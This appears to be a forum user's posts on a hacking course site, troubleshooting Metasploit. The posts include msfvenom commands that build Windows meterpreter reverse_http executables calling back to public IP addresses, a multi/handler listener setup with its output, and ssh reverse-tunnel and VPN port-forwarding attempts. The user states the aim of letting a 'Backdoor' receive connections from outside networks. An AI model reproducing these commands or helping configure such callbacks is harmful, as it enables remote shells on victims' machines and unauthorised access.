Forum Replies Created
- AuthorPosts
- Sylvester PeterParticipant
SIR THIS IS HOW I RUN THE METASPLOIT BELOW BUT IT DID NOT WORK AND ALSO THE RESULT IN SCREENSHOT IF THERE’S ANY MISTAKE PLEASE CORRECT ME THANKS.
msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.38.61 LPORT=443 -f exe -o /var/www/html/ACCESS.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.36.79 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=47.31.201.92 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe
………………………………………………………………………………………………..
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 143.244.38.61
set LPORT 443 and also I tried set LPORT 80Result Below…..
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 143.244.38.61
LHOST => 143.244.38.61
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit[-] Handler failed to bind to 143.244.38.61:443
[*] Started HTTP reverse handler on http://0.0.0.0:443Attachments:
You must be logged in to view attached files.Sylvester PeterParticipantHello Sir This is how i run the ssh and this is the Error i received and please tell me what to do sir Thanks.
root@kali:~# ssh -R 8088:localhost:80 191.96.168.232
ssh: connect to host 191.96.168.232 port 22: Connection refusedroot@kali:~# ssh -R 6489:localhost:80 191.96.168.232
ssh: connect to host 191.96.168.232 port 22: Connection refusedroot@kali:~# ssh -R 6489:localhost:80 192.168.220.128
ssh: connect to host 192.168.220.128 port 22: Connection refusedroot@kali:~# ssh -R 80:localhost:80 192.168.220.128
ssh: connect to host 192.168.220.128 port 22: Connection refusedroot@kali:~# ssh -R 6489:localhost:80 185.140.53.132
ssh: connect to host 185.140.53.132 port 22: Connection refusedroot@kali:~# ssh -R 6489:localhost:80 nvpn.net
ssh: connect to host nvpn.net port 22: Connection refusedroot@kali:~# ssh -R 6489:192.168.220.128:80 nvpn.net
ssh: connect to host nvpn.net port 22: Connection refusedroot@kali:~# ssh -R 80:192.168.220.128:80 nvpn.net
ssh: connect to host nvpn.net port 22: Connection refusedroot@kali:~# ssh -R 80:192.168.220.128:80 privateinternetaccess.com
ssh: connect to host privateinternetaccess.com port 22: Connection timed outSylvester PeterParticipantHello Sir, Please i need your urgent assistance as i have completed my Course but i’m still having problem in the port forwarding and i have tried all the means and processes for the port forwarding in Kali Linux to be able to receive connections from outside network but it it did not work out.
This is the Paid VPN i have used below
finchvpn.com
nvpn.net
privateinternetaccess.com
localhost.runSir please i need your one on one assistance through Anydesk or TeamViewer to teach me how to set it on msfvenom, msfconsole, TheFatRat and Empire, please i’m ready to pay for any extra cost for this lesson Thanks. i really enjoy the classes and the courese.
Sylvester PeterParticipantThank you sir and please explain to me steps on how to bind the listener to the interface connected to the VPN and use the public VPN in the Backdoor.
Sylvester PeterParticipantHello Sir this their Member Account i have Options to add Port Forwarding and this are the Ports i added in the Port Forwarding
6489
2404
6489
6649
6484
and this is my Assigned IP: 180.156.53.132So how do i Configure it The Router To Forward Connections To Kali.
Sylvester PeterParticipantThanks so much sir it worked.
- AuthorPosts